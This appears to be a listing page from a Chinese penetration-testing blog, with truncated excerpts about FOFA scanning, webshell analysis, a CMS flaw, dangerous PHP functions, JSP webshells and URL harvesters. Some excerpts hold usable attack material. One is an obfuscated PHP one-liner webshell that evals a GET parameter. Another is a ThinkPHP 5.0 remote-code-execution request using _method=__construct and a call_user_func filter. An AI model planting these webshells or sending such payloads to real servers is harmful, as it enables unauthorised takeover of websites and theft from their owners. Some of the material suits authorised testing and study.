更新内容： 1.修复fofa api搜索功能结果重复问题。 2.新增fofa api历史搜索关键词功能。 3.新增批量网站cms系统识别功能。 4.新增一键文本编码解码功能。 FOFA API历史搜索功能： 自动保存历史搜索记录，搜索关键词记录文件在运行目录的config下的“keyw [阅读全文]

以下文章来源于t00ls 日常网络冲浪的时候接到任务，拿下目标服务器getshell了以后，发现了个奇怪的php文件，文件比较大，有200k，怀着好奇的心理，便访问了一下。 不失所望，是个大马，本着好奇心下载了下来，尝试爆破，爆破成功 功能还算是齐全，正打算收入囊中，一想到上次xxx事件，心有余悸。。 查看 [阅读全文]

影响版本 V1.0.0.20200506_beta（最新版） 利用限制 /application/config.php 文件中： //是否开启前台会员中心 'usercenter' => true, 即需要开启会员中心功能 漏洞分析 /application/index/User.php文件 第5 [阅读全文]

分享给那些安服的苦逼们： 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 文件包含: require, requi [阅读全文]

php: $m=$_GET[ $m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c); ($a.$b); ?> asp： <% P=request("pass") A=mid(P,1,1 [阅读全文]

很不巧在实战中遇到jdk5的java站，本来jspspy可以用，结果jspspy通信数据没有任何加密处理，在waf目前废了 蚁剑、冰蝎是不支持jdk5的 目前功能不完善，只满足了我当时透站时的需求，功能大概如下 文件浏览，删除、剪切、复制、压缩、解压、新建文件、目录，搜索文件，上传文件，批量操作文件 在线shell 良好的界面外观 通信数据加密 [阅读全文]

漏洞及渗透练习平台： WebGoat漏洞练习平台： https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台： https://github.c [阅读全文]

0x1 _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo 通过phpinfo知道ThinkPHP版本为5.0.20,php版本为7.2.6，php 7以后版本无法使用assert getshell，找到日志包含执行exp！ 0x2 _method=__construc [阅读全文]

百度URL采集工具，采用最新的百度采集规则。 工具： 数据： 下载链接：https://share.weiyun.com/vrmK6GeU [阅读全文]

可以无限进行采集，python多线程 运行环境：python+redis 采集原理：从初始关键词里面采集网址，然后在网址里面爬取关键字，一边采集关键字，一边采集网址，redis数据库自动去重，多线程模式采集网址加url！ [阅读全文]